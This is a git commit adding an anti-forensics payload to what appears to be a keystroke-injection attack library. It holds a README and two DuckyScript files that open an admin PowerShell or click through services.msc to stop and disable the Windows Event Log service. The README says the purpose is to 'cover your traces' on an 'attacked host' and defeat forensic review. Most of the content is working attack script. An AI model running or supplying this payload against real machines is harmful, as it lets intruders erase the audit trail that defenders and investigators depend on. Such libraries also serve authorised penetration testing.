disable windows event logging

2024-08-07 19:16:27 +02:00 · 2024-08-07 19:16:27 +02:00 · 6bae2d0cc2
parent f4d54cfebe
commit 6bae2d0cc2
3 changed files with 92 additions and 0 deletions
--- a/payloads/library/execution/disable_windows_event_logging/README.md
+++ b/payloads/library/execution/disable_windows_event_logging/README.md
@ -0,0 +1,37 @@
+ 
+# Disable Windows Event Logging
+
+A script used to disable all Windows event logging on Windows 11.
+
+**Category**: Execution
+
+## Description
+
+Event logging can be used as a tool in forensics to determine what an attack entailed.
+In order to cover your traces, Windows Event Logging can be disabled. 
+These scripts demonstrate two approaches;
+- CLI based
+- UI based
+
+While the CLI based approach is more concise, requires less interaction (and therefore has fewer pitfalls) and faster, some might prefer 
+the UI based approach for demonstration purposes as it allows watching the attack play out.
+
+The CLI based approach starts an Powershell Window with administrator rights and executes two commands.
+The UI based approach clicks itself through the setting panes until it reaches the right place.
+
+
+The CLI script assumes that the currently logged in user has admin rights, if this is not the case, the admin password has to be substituted into the payload at the indicated line.
+If the UI script is used, the delay speeds may be adjusted to the (expected) speed of the attacked host. 
+
+## Getting Started
+
+### Dependencies
+
+* Windows 11 with Powershell
+* Windows Admin Permissions
+
+### Settings
+
+* Set the password for non default use (current user does not have admin rights)
+* Set delay times to your requirement
+
--- a/payloads/library/execution/disable_windows_event_logging/disable_windows_event_logging_UI.txt
+++ b/payloads/library/execution/disable_windows_event_logging/disable_windows_event_logging_UI.txt
@ -0,0 +1,39 @@
+DELAY 200
+GUI r
+DELAY 2000
+STRINGLN services.msc
+DELAY 4000
+TAB
+DELAY 2000
+STRING Windows Event Log
+DELAY 2000
+ENTER
+DELAY 1000
+TAB
+DELAY 2000
+STRING m
+DELAY 2000
+TAB
+DELAY 2000
+ENTER
+DELAY 6000
+TAB
+DELAY 2000
+TAB
+DELAY 2000
+TAB
+DELAY 2000
+TAB
+DELAY 2000
+ENTER
+DELAY 2000
+TAB
+DELAY 2000
+TAB
+DELAY 2000
+TAB
+DELAY 2000
+TAB
+DELAY 2000
+ENTER
+DELAY 500
--- a/payloads/library/execution/disable_windows_event_logging/disable_windows_event_logging_cli.txt
+++ b/payloads/library/execution/disable_windows_event_logging/disable_windows_event_logging_cli.txt
@ -0,0 +1,16 @@
+DUCKY_LANG DE_CH
+DELAY 50
+GUI x
+DELAY 100
+STRINGLN a
+DELAY 600
+REM replace the following line with the admin password if necessary
+LEFTARROW
+DELAY 50
+ENTER
+DELAY 2000
+STRINGLN Stop-Service -Name "eventlog"
+DELAY 200
+STRINGLN Set-Service -Name "eventlog" -StartupType Disabled
+DELAY 300
+STRINGLN exit